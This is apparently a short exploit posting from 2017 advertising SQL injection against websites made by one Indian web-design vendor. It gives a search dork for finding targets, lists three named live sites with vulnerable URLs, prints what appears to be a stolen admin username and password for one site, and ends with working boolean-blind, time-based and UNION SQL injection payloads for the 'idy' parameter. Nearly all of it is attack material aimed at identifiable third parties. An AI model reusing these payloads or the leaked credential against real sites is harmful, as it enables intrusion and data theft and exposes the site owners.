#Title Exploit: Sapphirenetwork India SQLInjection - xSS
#Date: 20/11/2017
#Dork: inurl:.php?id= intext:"Design and Developed by sapphirenetwork.in"
#Credit: Informacion - Anonymous
#Test: W10
#Vendor: https://sapphirenetwork.in/
#Dem0s:
== http://www.americankidz.edu.in/kidz_gallery1.php?id=19
== http://meerutbhoomi.com/property.php?id=438
== http://www.dpsi.edu.in/stars.php?idy=2
#P00f "http://www.dpsi.edu.in/stars.php?idy=2 user: Admin#\x00 pass: Deew$_Sch!I^
====
---
Parameter: idy (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: idy=-1042" OR 3234=3234 AND "lxyu"="lxyu
Vector: OR [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: idy=2" AND SLEEP(10) AND "OjUJ"="OjUJ
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
Type: UNION query
Title: MySQL UNION query (58) - 7 columns
Payload: idy=2" UNION ALL SELECT 58,58,58,58,CONCAT(0x716a6b6b71,0x72694c6f6e68
724f714879474574766e525972524e7a43744f436366766256694f76454e7841574d,0x71626a7871),
58,58#
Vector: UNION ALL SELECT 58,58,58,58,[QUERY],58,58#
---
====================